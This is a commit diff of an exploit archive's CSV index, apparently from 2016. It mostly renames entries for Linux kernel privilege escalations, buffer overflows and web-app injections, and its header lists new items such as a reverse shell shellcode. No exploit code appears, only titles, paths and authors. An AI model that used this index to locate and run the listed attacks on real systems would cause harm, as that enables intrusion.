DB: 2016-07-22

4 new exploits Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Local Proof of Concept (1) Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Local Proof of Concept (2) Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Validator (Proof of Concept) (1) Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Validator (Proof of Concept) (2) Linux Kernel <= 2.4.23 / <= 2.6.0 - 'mremap()' Bound Checking Root Exploit (3) Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Bound Checking Root Exploit (3) Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Local Proof of Concept (2) Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Validator (Proof of Concept) (1) Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Missing 'do_munmap' Exploit (1) Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Local Root Exploit (2) Linux Kernel <= 2.4.29-rc2 - 'uselib()' Privilege Elevation (1) Linux Kernel <= 2.4.29-rc2 - 'uselib()' Privilege Escalation (1) Linux Kernel 2.4 - 'uselib()' Privilege Elevation Exploit (2) Linux Kernel 2.4 - 'uselib()' Privilege Escalation Exploit (2) Linux Kernel 2.4 / 2.6 x86_64) - System Call Emulation Exploit Linux Kernel 2.4 / 2.6 (x86_64) - System Call Emulation Local Root Exploit TFTP Server 1.4 - ST Buffer Overflow Exploit (0Day) TFTP Server 1.4 - ST Buffer Overflow Exploit Linux Kernel < 2.6.22 - ftruncate()/open() Local Exploit Linux Kernel < 2.6.22 - ftruncate()/open() Local Root Exploit MuPDF pdf_shade4.c Multiple Stack-Based Buffer Overflows MuPDF < 20091125231942 - pdf_shade4.c Multiple Stack-Based Buffer Overflows (Linux Kernel <= 2.6.34-rc3) ReiserFS xattr (Redhat/Ubuntu 9.10) - Privilege Escalation ReiserFS xattr (Linux Kernel <= 2.6.34-rc3) (Redhat / Ubuntu 9.10) - Privilege Escalation Microsoft ASN.1 Library Bitstring Heap Overflow Microsoft Windows - ASN.1 Library Bitstring Heap Overflow (MS04-007) Linux Kernel 2.0 / 2.1 / 2.2 - autofs Linux Kernel 2.2 - ldd core Force Reboot Linux Kernel 2.2 - 'ldd core' Force Reboot OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (1) OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (2) OpenSSH 3.x - Challenge-Response Buffer Overflow Vulnerabilities (1) OpenSSH 3.x - Challenge-Response Buffer Overflow Vulnerabilities (2) Linux Kernel Samba 2.2.8 (Debian/Mandrake) - Share Local Privilege Elevation Linux Kernel Samba 2.2.8 (Debian / Mandrake) - Share Local Privilege Escalation Linux Kernel 3.14-rc1 <= 3.15-rc4 - Raw Mode PTY Local Echo Race Condition Local Privilege Escalation (x64) Linux Kernel 3.14-rc1 <= 3.15-rc4 (x64) - Raw Mode PTY Local Echo Race Condition Local Privilege Escalation Linux Kernel 2.6.26 - Auerswald USB Device Driver Buffer Overflow Proof of Concept Linux Kernel 2.6.26 - Auerswald USB Device Driver Buffer Overflow (Proof of Concept) Apport/Abrt - Local Root Exploit Apport/Abrt (Ubuntu / Fedora) - Local Root Exploit Ubuntu usb-creator 0.2.x - Local Privilege Escalation usb-creator 0.2.x (Ubuntu 12.04/14.04/14.10) - Local Privilege Escalation Apport/Ubuntu - Local Root Race Condition Apport (Ubuntu 14.04/14.10/15.04) - Local Root Race Condition Linux Kernel 4.4.0-2 (Ubuntu 16.04) - netfilter target_offset OOB Local Root Exploit Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - netfilter target_offset OOB Local Root Exploit TFTP Server 1.4 - WRQ Buffer Overflow Exploit (Egghunter) Linux/x86-64 - Subtle Probing Reverse Shell_ Timer_ Burst_ Password_ Multi-Terminal (84_ 122_ 172 bytes) TeamPass Passwords Management System 2.1.26 - Arbitrary File Download
2016-07-22 05:05:29 +00:00 · 2016-07-22 05:05:29 +00:00 · 789febc361
commit 789febc361
parent ec03ab428f
9 changed files with 414 additions and 24 deletions
--- a/files.csv
+++ b/files.csv
@ -136,11 +136,11 @@ id,file,description,date,author,platform,type,port
 138,platforms/php/webapps/138.pl,"PHP-Nuke <= 6.9 - 'cid' SQL Injection Remote Exploit",2003-12-21,RusH,php,webapps,0
 139,platforms/linux/remote/139.c,"Cyrus IMSPD 1.7 - abook_dbname Remote Root Exploit",2003-12-27,SpikE,linux,remote,406
 140,platforms/linux/local/140.c,"Xsok 1.02 - '-xsokdir' Local Buffer Overflow Game Exploit",2004-01-02,c0wboy,linux,local,0
-141,platforms/linux/local/141.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Local Proof of Concept (1)",2004-01-06,"Christophe Devine",linux,local,0
-142,platforms/linux/local/142.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Local Proof of Concept (2)",2004-01-07,"Christophe Devine",linux,local,0
+141,platforms/linux/local/141.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Validator (Proof of Concept) (1)",2004-01-06,"Christophe Devine",linux,local,0
+142,platforms/linux/local/142.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Validator (Proof of Concept) (2)",2004-01-07,"Christophe Devine",linux,local,0
 143,platforms/linux/remote/143.c,"lftp <= 2.6.9 - Remote Stack based Overflow Exploit",2004-01-14,Li0n7,linux,remote,0
 144,platforms/linux/local/144.c,"SuSE Linux 9.0 - YaST config Skribt Local Exploit",2004-01-15,l0om,linux,local,0
-145,platforms/linux/local/145.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - 'mremap()' Bound Checking Root Exploit (3)",2004-01-15,"Paul Starzetz",linux,local,0
+145,platforms/linux/local/145.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Bound Checking Root Exploit (3)",2004-01-15,"Paul Starzetz",linux,local,0
 146,platforms/multiple/dos/146.c,"OpenSSL ASN.1<= 0.9.6j <= 0.9.7b - Brute Forcer for Parsing Bugs",2003-10-09,"Bram Matthys",multiple,dos,0
 147,platforms/windows/dos/147.c,"Need for Speed 2 - Remote Client Buffer Overflow Exploit",2004-01-23,"Luigi Auriemma",windows,dos,0
 148,platforms/windows/dos/148.sh,"Microsoft Windows 2003/XP - Samba Share Resource Exhaustion Exploit",2004-01-25,"Steve Ladjabi",windows,dos,0
@ -148,13 +148,13 @@ id,file,description,date,author,platform,type,port
 151,platforms/windows/remote/151.txt,"Microsoft Internet Explorer - URL Injection in History List (MS04-004)",2004-02-04,"Andreas Sandblad",windows,remote,0
 152,platforms/linux/local/152.c,"rsync <= 2.5.7 - Local Stack Overflow Root Exploit",2004-02-13,"Abhisek Datta",linux,local,0
 153,platforms/windows/dos/153.c,"Microsoft Windows - ASN.1 LSASS.EXE Remote Exploit (MS04-007)",2004-02-14,"Christophe Devine",windows,dos,0
-154,platforms/linux/local/154.c,"Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Local Proof of Concept (2)",2004-02-18,"Christophe Devine",linux,local,0
+154,platforms/linux/local/154.c,"Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Validator (Proof of Concept) (1)",2004-02-18,"Christophe Devine",linux,local,0
 155,platforms/windows/remote/155.c,"GateKeeper Pro 4.7 - Web proxy Remote Buffer Overflow Exploit",2004-02-26,kralor,windows,remote,3128
 156,platforms/windows/remote/156.c,"PSOProxy 0.91 - Remote Buffer Overflow Exploit (Windows 2000/XP)",2004-02-26,Rave,windows,remote,8080
 157,platforms/windows/remote/157.c,"IPSwitch IMail LDAP Daemon - Remote Buffer Overflow Exploit",2004-02-27,"Johnny Cyberpunk",windows,remote,389
 158,platforms/windows/remote/158.c,"Serv-U FTPD 3.x/4.x/5.x - (MDTM) Remote Overflow Exploit",2004-02-27,Sam,windows,remote,21
 159,platforms/windows/remote/159.c,"WFTPD Server <= 3.21 - Remote Buffer Overflow Exploit",2004-02-29,rdxaxl,windows,remote,21
-160,platforms/linux/local/160.c,"Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Missing 'do_munmap' Exploit (1)",2004-03-01,"Paul Starzetz",linux,local,0
+160,platforms/linux/local/160.c,"Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Local Root Exploit (2)",2004-03-01,"Paul Starzetz",linux,local,0
 161,platforms/windows/dos/161.c,"Red Faction <= 1.20 - Server Reply Remote Buffer Overflow Exploit",2004-03-04,"Luigi Auriemma",windows,dos,0
 163,platforms/windows/remote/163.pl,"Eudora 6.0.3 - Attachment Spoofing Exploit (Windows)",2004-03-19,anonymous,windows,remote,0
 164,platforms/windows/remote/164.c,"Foxmail 5.0 - PunyLib.dll Remote Stack Overflow Exploit",2004-03-23,xfocus,windows,remote,0
@ -574,7 +574,7 @@ id,file,description,date,author,platform,type,port
 741,platforms/linux/local/741.pl,"HTGET <= 0.9.x - Local Root Exploit",2005-01-05,nekd0,linux,local,0
 742,platforms/windows/dos/742.c,"Gore <= 1.50 - Socket Unreacheable Denial of Service Exploit",2005-01-06,"Luigi Auriemma",windows,dos,0
 743,platforms/windows/dos/743.html,"Norton Antivirus < 2005 - Remote Stack Overflow Exploit",2005-01-06,"Rafel Ivgi",windows,dos,0
-744,platforms/linux/local/744.c,"Linux Kernel <= 2.4.29-rc2 - 'uselib()' Privilege Elevation (1)",2005-01-07,"Paul Starzetz",linux,local,0
+744,platforms/linux/local/744.c,"Linux Kernel <= 2.4.29-rc2 - 'uselib()' Privilege Escalation (1)",2005-01-07,"Paul Starzetz",linux,local,0
 745,platforms/multiple/remote/745.cgi,"Webmin 1.5 - Web Brute Force (cgi-version)",2005-01-08,ZzagorR,multiple,remote,10000
 746,platforms/multiple/remote/746.pl,"Webmin 1.5 - BruteForce + Command Execution",2005-01-08,ZzagorR,multiple,remote,10000
 749,platforms/windows/local/749.cpp,"Microsoft Windows - Improper Token Validation Local Exploit",2005-01-11,"Cesar Cerrudo",windows,local,0
@ -601,7 +601,7 @@ id,file,description,date,author,platform,type,port
 774,platforms/php/webapps/774.pl,"Siteman <= 1.1.10 - Remote Administrative Account Addition Exploit",2005-01-25,"Noam Rathaus",php,webapps,0
 775,platforms/linux/remote/775.c,"Berlios gpsd <= 2.7.x - Remote Format String",2005-01-26,JohnH,linux,remote,2947
 776,platforms/linux/local/776.c,"/usr/bin/trn - Local Exploit (not suid)",2005-01-26,ZzagorR,linux,local,0
-778,platforms/linux/local/778.c,"Linux Kernel 2.4 - 'uselib()' Privilege Elevation Exploit (2)",2005-01-27,"Tim Hsu",linux,local,0
+778,platforms/linux/local/778.c,"Linux Kernel 2.4 - 'uselib()' Privilege Escalation Exploit (2)",2005-01-27,"Tim Hsu",linux,local,0
 779,platforms/linux/local/779.sh,"Linux ncpfs - Local Exploit",2005-01-30,super,linux,local,0
 780,platforms/windows/dos/780.c,"Xpand Rally <= 1.0.0.0 (Server/Clients) - Crash Exploit",2005-01-31,"Luigi Auriemma",windows,dos,28015
 781,platforms/windows/remote/781.py,"Savant Web Server 3.1 - Remote Buffer Overflow Exploit (1)",2005-02-01,"Tal Zeltzer",windows,remote,80
@ -4105,7 +4105,7 @@ id,file,description,date,author,platform,type,port
 4457,platforms/php/webapps/4457.txt,"Softbiz Classifieds PLUS (id) Remote SQL Injection",2007-09-26,"Khashayar Fereidani",php,webapps,0
 4458,platforms/asp/webapps/4458.txt,"Novus 1.0 - (notas.asp nota_id) Remote SQL Injection",2007-09-26,ka0x,asp,webapps,0
 4459,platforms/php/webapps/4459.txt,"ActiveKB Knowledgebase 2.? (catId) Remote SQL Injection",2007-09-26,Luna-Tic/XTErner,php,webapps,0
-4460,platforms/linux/local/4460.c,"Linux Kernel 2.4 / 2.6 x86_64) - System Call Emulation Exploit",2007-09-27,"Robert Swiecki",linux,local,0
+4460,platforms/linux/local/4460.c,"Linux Kernel 2.4 / 2.6 (x86_64) - System Call Emulation Local Root Exploit",2007-09-27,"Robert Swiecki",linux,local,0
 4461,platforms/php/webapps/4461.txt,"lustig.cms BETA 2.5 - (forum.php view) Remote File Inclusion",2007-09-27,GoLd_M,php,webapps,0
 4462,platforms/php/webapps/4462.txt,"Chupix CMS 0.2.3 - (repertoire) Remote File Inclusion",2007-09-27,0in,php,webapps,0
 4463,platforms/php/webapps/4463.txt,"integramod nederland 1.4.2 - Remote File Inclusion",2007-09-27,"Mehmet Ince",php,webapps,0
@ -4947,7 +4947,7 @@ id,file,description,date,author,platform,type,port
 5311,platforms/php/webapps/5311.txt,"TopperMod 2.0 - Remote SQL Injection",2008-03-25,girex,php,webapps,0
 5312,platforms/php/webapps/5312.txt,"TopperMod 1.0 - (mod.php) Local File Inclusion",2008-03-25,girex,php,webapps,0
 5313,platforms/hardware/remote/5313.txt,"Linksys WRT54G (firmware 1.00.9) - Security Bypass Vulnerabilities",2008-03-26,meathive,hardware,remote,0
-5314,platforms/windows/remote/5314.py,"TFTP Server 1.4 - ST Buffer Overflow Exploit (0Day)",2008-03-26,muts,windows,remote,69
+5314,platforms/windows/remote/5314.py,"TFTP Server 1.4 - ST Buffer Overflow Exploit",2008-03-26,muts,windows,remote,69
 5315,platforms/windows/remote/5315.py,"Quick TFTP Pro 2.1 - Remote SEH Overflow Exploit (0Day)",2008-03-26,muts,windows,remote,69
 5316,platforms/windows/dos/5316.py,"PacketTrap Networks pt360 2.0.39 TFTPD - Remote DoS Exploit",2008-03-26,muts,windows,dos,0
 5317,platforms/php/webapps/5317.txt,"JAF-CMS 4.0 RC2 - Multiple Remote File Inclusion Vulnerabilities",2008-03-26,CraCkEr,php,webapps,0
@ -6416,7 +6416,7 @@ id,file,description,date,author,platform,type,port
 6848,platforms/php/webapps/6848.txt,"TlAds 1.0 - Remote Insecure Cookie Handling",2008-10-27,x0r,php,webapps,0
 6849,platforms/php/webapps/6849.txt,"e107 Plugin alternate_profiles (id) SQL Injection",2008-10-27,boom3rang,php,webapps,0
 6850,platforms/php/webapps/6850.txt,"MyKtools 2.4 - (langage) Local File Inclusion",2008-10-27,x0r,php,webapps,0
-6851,platforms/linux/local/6851.c,"Linux Kernel < 2.6.22 - ftruncate()/open() Local Exploit",2008-10-27,gat3way,linux,local,0
+6851,platforms/linux/local/6851.c,"Linux Kernel < 2.6.22 - ftruncate()/open() Local Root Exploit",2008-10-27,gat3way,linux,local,0
 6852,platforms/php/webapps/6852.pl,"e107 Plugin EasyShop (category_id) Blind SQL Injection Exploit",2008-10-27,StAkeR,php,webapps,0
 6853,platforms/php/webapps/6853.txt,"questcms - (XSS/Directory Traversal/SQL) Multiple Vulnerabilities",2008-10-27,d3b4g,php,webapps,0
 6854,platforms/php/webapps/6854.txt,"Aiocp 1.4 - (poll_id) Remote SQL Injection",2008-10-27,ExSploiters,php,webapps,0
@ -9541,7 +9541,7 @@ id,file,description,date,author,platform,type,port
 10241,platforms/php/webapps/10241.txt,"Uploaderr 1.0 - File Hosting Script Shell Upload",2009-11-28,DigitALL,php,webapps,0
 10242,platforms/php/dos/10242.txt,"PHP < 5.3.1 - 'multipart/form-data' Denial of Service Exploit (Python)",2009-11-27,Eren,php,dos,0
 10243,platforms/php/dos/10243.txt,"PHP - MultiPart Form-Data Denial of Service PoC",2009-11-22,"Bogdan Calin",php,dos,0
-10244,platforms/windows/local/10244.txt,"MuPDF pdf_shade4.c Multiple Stack-Based Buffer Overflows",2009-11-28,"Christophe Devine",windows,local,0
+10244,platforms/windows/local/10244.txt,"MuPDF < 20091125231942 - pdf_shade4.c Multiple Stack-Based Buffer Overflows",2009-11-28,"Christophe Devine",windows,local,0
 10245,platforms/php/webapps/10245.txt,"phpBazar <= 2.1.1fix (cid) SQL Injection",2009-11-28,MizoZ,php,webapps,0
 10246,platforms/php/webapps/10246.txt,"SweetRice <= 0.5.3 - Remote File Include",2009-11-29,"cr4wl3r ",php,webapps,0
 10247,platforms/hardware/webapps/10247.txt,"Micronet SP1910 Data Access Controller UI XSS & HTML Code Injection",2009-11-27,K053,hardware,webapps,0
@ -11071,7 +11071,7 @@ id,file,description,date,author,platform,type,port
 12123,platforms/php/webapps/12123.txt,"joomla Component com_pcchess Local File Inclusion",2010-04-09,team_elite,php,webapps,0
 12124,platforms/php/webapps/12124.txt,"joomla component huruhelpdesk SQL Injection",2010-04-09,bumble_be,php,webapps,0
 12128,platforms/php/webapps/12128.txt,"GarageSales Remote Upload",2010-04-09,saidinh0,php,webapps,0
-12130,platforms/linux/local/12130.py,"(Linux Kernel <= 2.6.34-rc3) ReiserFS xattr (Redhat/Ubuntu 9.10) - Privilege Escalation",2010-04-09,"Jon Oberheide",linux,local,0
+12130,platforms/linux/local/12130.py,"ReiserFS xattr (Linux Kernel <= 2.6.34-rc3) (Redhat / Ubuntu 9.10) - Privilege Escalation",2010-04-09,"Jon Oberheide",linux,local,0
 12131,platforms/windows/dos/12131.py,"Tembria Server Monitor 5.6.0 - Denial of Service",2010-04-09,Lincoln,windows,dos,0
 12132,platforms/php/webapps/12132.pl,"joomla component com_agenda 1.0.1 - (id) SQL Injection",2010-04-09,v3n0m,php,webapps,0
 12133,platforms/multiple/webapps/12133.txt,"Asset Manager 1.0 Shell Upload",2010-04-09,"Shichemt Alen and NeT_Own3r",multiple,webapps,0
@ -14177,7 +14177,7 @@ id,file,description,date,author,platform,type,port
 16374,platforms/windows/remote/16374.rb,"Microsoft Windows Authenticated User Code Execution",2010-12-02,Metasploit,windows,remote,0
 16375,platforms/windows/remote/16375.rb,"Microsoft RRAS Service RASMAN Registry Overflow",2010-08-25,Metasploit,windows,remote,0
 16376,platforms/windows/remote/16376.rb,"Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow",2010-11-24,Metasploit,windows,remote,0
-16377,platforms/windows/remote/16377.rb,"Microsoft ASN.1 Library Bitstring Heap Overflow",2010-07-25,Metasploit,windows,remote,0
+16377,platforms/windows/remote/16377.rb,"Microsoft Windows - ASN.1 Library Bitstring Heap Overflow (MS04-007)",2010-07-25,Metasploit,windows,remote,0
 16378,platforms/windows/remote/16378.rb,"Microsoft Workstation Service NetAddAlternateComputerName Overflow",2010-05-09,Metasploit,windows,remote,0
 16379,platforms/windows/remote/16379.rb,"Microsoft Outlook Express NNTP Response Parsing Buffer Overflow",2010-05-09,Metasploit,windows,remote,0
 16380,platforms/windows/remote/16380.rb,"CitectSCADA/CitectFacilities ODBC Buffer Overflow",2010-11-14,Metasploit,windows,remote,0
@ -16639,7 +16639,7 @@ id,file,description,date,author,platform,type,port
 19247,platforms/linux/remote/19247.c,"Microsoft IIS 4.0 - Buffer Overflow (3)",1999-06-15,"eeye security",linux,remote,0
 19248,platforms/windows/remote/19248.c,"Microsoft IIS 4.0 - Buffer Overflow (4)",1999-06-15,"Greg Hoglund",windows,remote,0
 19249,platforms/linux/local/19249.c,"Xcmail 0.99.6",1999-03-02,Arthur,linux,local,0
-19250,platforms/linux/local/19250.txt,"Linux Kernel 2.0 / 2.1 / 2.2 - autofs",1999-02-19,"Brian Jones",linux,local,0
+19250,platforms/linux/dos/19250.txt,"Linux Kernel 2.0 / 2.1 / 2.2 - autofs",1999-02-19,"Brian Jones",linux,dos,0
 19251,platforms/linux/remote/19251.c,"tcpdump 3.4 Protocol Four and Zero Header Length",1999-06-16,badi,linux,remote,0
 19401,platforms/windows/local/19401.txt,"quicktime.util.QTByteObject Initialization Security Checks Bypass",2012-06-26,"Security Explorations",windows,local,0
 19253,platforms/linux/remote/19253.txt,"Debian Linux 2.1 - httpd",1999-06-17,anonymous,linux,remote,0
@ -16661,7 +16661,7 @@ id,file,description,date,author,platform,type,port
 19269,platforms/irix/local/19269.txt,"SGI IRIX <= 6.0.1 colorview",1995-02-09,"Dave Sill",irix,local,0
 19270,platforms/linux/local/19270.c,"Debian Linux 2.0 - Super Syslog Buffer Overflow",1999-02-25,c0nd0r,linux,local,0
 19271,platforms/linux/dos/19271.c,"Linux Kernel 2.0 - TCP Port DoS",1999-01-19,"David Schwartz",linux,dos,0
-19272,platforms/linux/local/19272.txt,"Linux Kernel 2.2 - ldd core Force Reboot",1999-01-26,"Dan Burcaw",linux,local,0
+19272,platforms/linux/local/19272.txt,"Linux Kernel 2.2 - 'ldd core' Force Reboot",1999-01-26,"Dan Burcaw",linux,local,0
 19273,platforms/irix/local/19273.sh,"SGI IRIX 6.2 - day5notifier",1997-05-16,"Mike Neuman",irix,local,0
 19274,platforms/irix/local/19274.c,"SGI IRIX <= 6.3 df",1997-05-24,"David Hedley",irix,local,0
 19275,platforms/irix/local/19275.c,"SGI IRIX <= 6.4 datman/cdman",1996-12-09,"Yuri Volobuev",irix,local,0
@ -18854,8 +18854,8 @@ id,file,description,date,author,platform,type,port
 21575,platforms/multiple/dos/21575.txt,"Mod_SSL 2.8.x Off-By-One HTAccess Buffer Overflow",2002-06-22,"Frank DENIS",multiple,dos,0
 21576,platforms/windows/remote/21576.txt,"Working Resources BadBlue 1.7 - EXT.DLL Cross-Site Scripting",2002-06-23,"Matthew Murphy",windows,remote,0
 21577,platforms/hp-ux/local/21577.c,"HP CIFS/9000 Server A.01.05/A.01.06 - Buffer Overflow",2002-11-06,watercloud,hp-ux,local,0
-21578,platforms/unix/remote/21578.txt,"OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (1)",2002-06-24,"Christophe Devine",unix,remote,0
-21579,platforms/unix/remote/21579.txt,"OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (2)",2002-06-24,"Gobbles Security",unix,remote,0
+21578,platforms/unix/remote/21578.txt,"OpenSSH 3.x - Challenge-Response Buffer Overflow Vulnerabilities (1)",2002-06-24,"Christophe Devine",unix,remote,0
+21579,platforms/unix/remote/21579.txt,"OpenSSH 3.x - Challenge-Response Buffer Overflow Vulnerabilities (2)",2002-06-24,"Gobbles Security",unix,remote,0
 21580,platforms/linux/dos/21580.txt,"Inktomi Traffic Server 4/5 Traffic_Manager Path Argument Buffer Overflow",2002-06-25,"Juliano Rizzo",linux,dos,0
 21581,platforms/windows/remote/21581.txt,"Summit Computer Networks Lil' HTTP Server 2 URLCount.CGI HTML Injection",2002-06-27,"Matthew Murphy",windows,remote,0
 21582,platforms/windows/remote/21582.txt,"Macromedia JRun 3/4 Administrative Authentication Bypass",2002-06-28,"Matt Moore",windows,remote,0
@ -20889,7 +20889,7 @@ id,file,description,date,author,platform,type,port
 23671,platforms/linux/remote/23671.txt,"Caucho Technology Resin 2.1.12 - Directory Listings Disclosure",2004-02-09,"Wang Yun",linux,remote,0
 23672,platforms/hardware/dos/23672.txt,"Red-M Red-Alert 3.1 - Remote Vulnerabilities",2004-02-09,"Bruno Morisson",hardware,dos,0
 23673,platforms/php/webapps/23673.txt,"Guru Auction 2.0 - Multiple SQL Injection Vulnerabilities",2012-12-26,v3n0m,php,webapps,0
-23674,platforms/linux/local/23674.txt,"Linux Kernel Samba 2.2.8 (Debian/Mandrake) - Share Local Privilege Elevation",2004-02-09,"Martin Fiala",linux,local,0
+23674,platforms/linux/local/23674.txt,"Linux Kernel Samba 2.2.8 (Debian / Mandrake) - Share Local Privilege Escalation",2004-02-09,"Martin Fiala",linux,local,0
 23675,platforms/windows/remote/23675.txt,"Microsoft Windows XP HCP URI Handler Arbitrary Command Execution",2004-02-09,"Bartosz Kwitkowski",windows,remote,0
 23676,platforms/asp/webapps/23676.txt,"MaxWebPortal 1.3x down.asp HTTP_REFERER XSS",2004-02-10,"Manuel Lopez",asp,webapps,0
 23677,platforms/asp/webapps/23677.txt,"MaxWebPortal 1.3x Personal Message SendTo Parameter XSS",2004-02-10,"Manuel Lopez",asp,webapps,0
@ -30208,7 +30208,7 @@ id,file,description,date,author,platform,type,port
 33511,platforms/multiple/webapps/33511.txt,"Zenoss 2.3.3 - Multiple SQL Injection Vulnerabilities",2010-01-14,"nGenuity Information Services",multiple,webapps,0
 33514,platforms/php/webapps/33514.txt,"Videos Tube 1.0 - Multiple SQL Injection Vulnerabilities",2014-05-26,"Mustafa ALTINKAYNAK",php,webapps,80
 33646,platforms/php/webapps/33646.txt,"Joomla MS Comment Component 0.8.0b Security Bypass and Cross-Site Scripting Vulnerabilities",2009-12-31,"Jeff Channell",php,webapps,0
-33516,platforms/linux/local/33516.c,"Linux Kernel 3.14-rc1 <= 3.15-rc4 - Raw Mode PTY Local Echo Race Condition Local Privilege Escalation (x64)",2014-05-26,"Matthew Daley",linux,local,0
+33516,platforms/linux/local/33516.c,"Linux Kernel 3.14-rc1 <= 3.15-rc4 (x64) - Raw Mode PTY Local Echo Race Condition Local Privilege Escalation",2014-05-26,"Matthew Daley",linux,local,0
 33518,platforms/hardware/webapps/33518.txt,"ZyXEL P-660HW-T1 3 Wireless Router - CSRF",2014-05-26,"Mustafa ALTINKAYNAK",hardware,webapps,80
 33635,platforms/linux/dos/33635.c,"Linux Kernel 2.6.x - 'net/ipv6/ip6_output.c' NULL Pointer Dereference Denial of Service",2008-07-31,"Rémi Denis-Courmont",linux,dos,0
 33520,platforms/hardware/webapps/33520.txt,"D-Link Routers - Multiple Vulnerabilities",2014-05-26,"Kyle Lovett",hardware,webapps,80
@ -32420,7 +32420,7 @@ id,file,description,date,author,platform,type,port
 35953,platforms/windows/local/35953.c,"McAfee Data Loss Prevention Endpoint - Arbitrary Write Privilege Escalation",2015-01-30,"Parvez Anwar",windows,local,0
 35955,platforms/php/webapps/35955.txt,"Easy Estate Rental 's_location' Parameter SQL Injection",2011-07-15,Lazmania61,php,webapps,0
 35956,platforms/php/webapps/35956.txt,"Joomla Foto Component 'id_categoria' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
-35957,platforms/linux/local/35957.txt,"Linux Kernel 2.6.26 - Auerswald USB Device Driver Buffer Overflow Proof of Concept",2009-10-19,"R. Dominguez Veg",linux,local,0
+35957,platforms/linux/local/35957.txt,"Linux Kernel 2.6.26 - Auerswald USB Device Driver Buffer Overflow (Proof of Concept)",2009-10-19,"R. Dominguez Veg",linux,local,0
 35958,platforms/php/webapps/35958.txt,"Joomla Juicy Gallery Component 'picId' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
 35959,platforms/php/webapps/35959.txt,"Joomla! 'com_hospital' Component SQL Injection",2011-07-15,SOLVER,php,webapps,0
 35960,platforms/php/webapps/35960.txt,"Joomla Controller Component 'Itemid' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
@ -33148,7 +33148,7 @@ id,file,description,date,author,platform,type,port
 36735,platforms/php/webapps/36735.txt,"WordPress Duplicator <= 0.5.14 - SQL Injection & CSRF",2015-04-13,"Claudio Viviani",php,webapps,0
 36736,platforms/php/webapps/36736.txt,"Traidnt Up 3.0 - SQL Injection",2015-04-13,"Ali Trixx",php,webapps,0
 36738,platforms/php/webapps/36738.txt,"WordPress N-Media Website Contact Form with File Upload 1.3.4 - Shell Upload",2015-04-13,"Claudio Viviani",php,webapps,0
-36746,platforms/linux/local/36746.c,"Apport/Abrt - Local Root Exploit",2015-04-14,"Tavis Ormandy",linux,local,0
+36746,platforms/linux/local/36746.c,"Apport/Abrt (Ubuntu / Fedora) - Local Root Exploit",2015-04-14,"Tavis Ormandy",linux,local,0
 36761,platforms/php/webapps/36761.txt,"WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Deletion Exploit",2015-04-14,LiquidWorm,php,webapps,80
 36741,platforms/linux/dos/36741.py,"Samba < 3.6.2 x86 - PoC",2015-04-13,sleepya,linux,dos,0
 36742,platforms/linux/remote/36742.txt,"ProFTPd 1.3.5 - File Copy",2015-04-13,anonymous,linux,remote,0
@ -33223,7 +33223,7 @@ id,file,description,date,author,platform,type,port
 36852,platforms/php/webapps/36852.txt,"TestLink Multiple SQL Injection Vulnerabilities",2012-02-20,"Juan M. Natal",php,webapps,0
 36818,platforms/php/webapps/36818.php,"Wolf CMS 0.8.2 - Arbitrary File Upload Exploit",2015-04-22,"CWH Underground",php,webapps,80
 36819,platforms/windows/local/36819.pl,"MooPlayer 1.3.0 - 'm3u' SEH Buffer Overflow (3)",2015-04-22,"Tomislav Paskalev",windows,local,0
-36820,platforms/linux/local/36820.txt,"Ubuntu usb-creator 0.2.x - Local Privilege Escalation",2015-04-23,"Tavis Ormandy",linux,local,0
+36820,platforms/linux/local/36820.txt,"usb-creator 0.2.x (Ubuntu 12.04/14.04/14.10) - Local Privilege Escalation",2015-04-23,"Tavis Ormandy",linux,local,0
 36821,platforms/php/webapps/36821.txt,"WebUI 1.5b6 - Remote Code Execution",2015-04-23,"TUNISIAN CYBER",php,webapps,0
 36822,platforms/windows/local/36822.pl,"Quick Search 1.1.0.189 - 'search textbox' Unicode SEH egghunter Buffer Overflow",2015-04-23,"Tomislav Paskalev",windows,local,0
 36823,platforms/php/webapps/36823.txt,"Ultimate Product Catalogue WordPress Plugin - Unauthenticated SQLi",2015-04-23,"Felipe Molina",php,webapps,0
@ -33471,7 +33471,7 @@ id,file,description,date,author,platform,type,port
 37085,platforms/php/webapps/37085.txt,"Seditio CMS 165 - 'plug.php' SQL Injection",2012-04-15,AkaStep,php,webapps,0
 37086,platforms/php/webapps/37086.txt,"WordPress Yahoo Answer Plugin Multiple Cross Site Scripting Vulnerabilities",2012-04-16,"Ryuzaki Lawlet",php,webapps,0
 37087,platforms/php/webapps/37087.txt,"TeamPass 2.1.5 - 'login' Field HTML Injection",2012-04-17,"Marcos Garcia",php,webapps,0
